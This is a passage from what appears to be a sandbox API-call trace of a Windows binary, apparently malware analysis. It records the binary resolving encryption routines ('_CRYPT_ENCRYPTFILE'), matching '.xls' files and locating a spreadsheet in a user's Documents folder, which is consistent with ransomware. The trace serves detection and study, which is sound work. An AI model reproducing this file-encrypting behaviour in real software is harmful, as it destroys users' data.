lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0034.465] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.465] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0034.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af598 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.466] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.466] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0034.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.468] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.468] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0034.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.469] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c50e0 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.470] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0034.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1f0) returned 0x7c95d0 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af588 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0034.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0034.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.472] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76580980, ftCreationTime.dwHighDateTime=0x1d5baac, ftLastAccessTime.dwLowDateTime=0x9d824440, ftLastAccessTime.dwHighDateTime=0x1d5b5f6, ftLastWriteTime.dwLowDateTime=0x9d824440, ftLastWriteTime.dwHighDateTime=0x1d5b5f6, nFileSizeHigh=0x0, nFileSizeLow=0x12571, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="2KU7thE4LQT.xls", cAlternateFileName="2KU7TH~1.XLS")) returned 0x7c2100 [0034.472] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0034.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.472] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0034.472] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.473] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.473] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.473] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.473] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, 